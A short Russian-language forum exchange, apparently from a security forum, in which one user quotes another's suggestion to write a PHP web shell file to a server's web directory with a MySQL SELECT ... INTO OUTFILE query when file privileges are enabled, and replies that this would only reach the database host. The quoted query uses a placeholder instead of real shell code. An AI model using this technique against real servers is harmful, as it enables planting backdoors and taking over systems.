
17.10.2009, 19:56
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сообщение от mailbrush
Если file_priv = Y и есть путь к корню, то
Код:
SELECT '<?php echo "shellcode"; ?>' FROM table_name INTO OUTFILE '/full/path/to/dir/shell.php'
Если даже и так то он зальёт на сервер с БД
Я обращаюсь к БД напрямую а не через инъекцию
|
|
|